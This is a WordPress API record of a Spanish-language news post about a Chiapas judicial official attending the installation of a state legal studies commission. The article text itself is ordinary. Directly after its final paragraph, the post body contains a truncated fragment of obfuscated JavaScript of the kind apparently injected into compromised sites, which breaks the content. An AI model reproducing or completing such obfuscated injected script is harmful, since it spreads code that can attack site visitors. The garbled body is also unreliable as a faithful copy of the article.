{"id":22039,"date":"2025-05-22T04:35:48","date_gmt":"2025-05-22T04:35:48","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22039"},"modified":"2025-05-22T04:35:49","modified_gmt":"2025-05-22T04:35:49","slug":"juan-carlos-moreno-participa-en-la-instalacion-de-la-comision-de-estudios-juridicos-del-gobierno-del-estado","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22039","title":{"rendered":"Juan Carlos Moreno participa en la Instalaci\u00f3n de la Comisi\u00f3n de Estudios Jur\u00eddicos del Gobierno del Estado"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"22040\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250521-WA0006-1024x682.jpg\" alt=\"\" class=\"wp-image-22040\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250521-WA0006-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250521-WA0006-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250521-WA0006-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250521-WA0006-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250521-WA0006-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250521-WA0006-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"22041\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250521-WA0007-1024x681.jpg\" alt=\"\" class=\"wp-image-22041\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250521-WA0007-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250521-WA0007-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250521-WA0007-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250521-WA0007-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250521-WA0007-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250521-WA0007-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>21 de mayo del 2025. Tuxtla Guti\u00e9rrez.- El magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, particip\u00f3 junto al gobernador Eduardo Ram\u00edrez Aguilar en el evento de Instalaci\u00f3n de la Comisi\u00f3n de Estudios Jur\u00eddicos del Gobierno del Estado, realizado en el Auditorio de Los Constituyentes de la Universidad Aut\u00f3noma de Chiapas (Unach).<\/p>\n\n\n\n<p>En este evento, organizado por el consejero jur\u00eddico del Gobierno del Estado, Guillermo Nieto Arreola; el magistrado presidente Moreno Guill\u00e9n celebr\u00f3 que Chiapas cuente con esta Comisi\u00f3n, ya que con su labor y sus acciones se lograr\u00e1 reforzar la \u00e9tica jur\u00eddica, y se podr\u00e1 contar con mejores juristas.<\/p>\n\n\n\n<p>Asimismo, el magistrado presidente Juan Carlos Moreno Guill\u00e9n fue el encargado de realizar la toma de protesta de las y los integrantes que conformar\u00e1n esta Comisi\u00f3n de Estudios Jur\u00eddicos del Gobierno del Estado.<\/p>\n\n\n\n<p>Estuvieron presentes en este evento el presidente de la Mesa Directiva del Congreso del Estado, Luis Ignacio Avenda\u00f1o Berm\u00fadez; la secretaria de Anticorrupci\u00f3n y Buen Gobierno, Ana Laura Romero Basurto; el rector de la Universidad Aut\u00f3noma de Chiapas (Unach), Oswaldo Chac\u00f3n Rojas; adem\u00e1s de servidoras y servidores del estado.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 21 de mayo del 2025. Tuxtla Guti\u00e9rrez.- El magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, particip\u00f3 junto al gobernador Eduardo Ram\u00edrez Aguilar en el evento de Instalaci\u00f3n de la Comisi\u00f3n de Estudios Jur\u00eddicos del Gobierno del Estado, realizado en el Auditorio de Los Constituyentes de la Universidad Aut\u00f3noma de Chiapas &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22040,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-22039","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22039","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22039"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22039\/revisions"}],"predecessor-version":[{"id":22042,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22039\/revisions\/22042"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22040"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22039"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22039"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22039"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}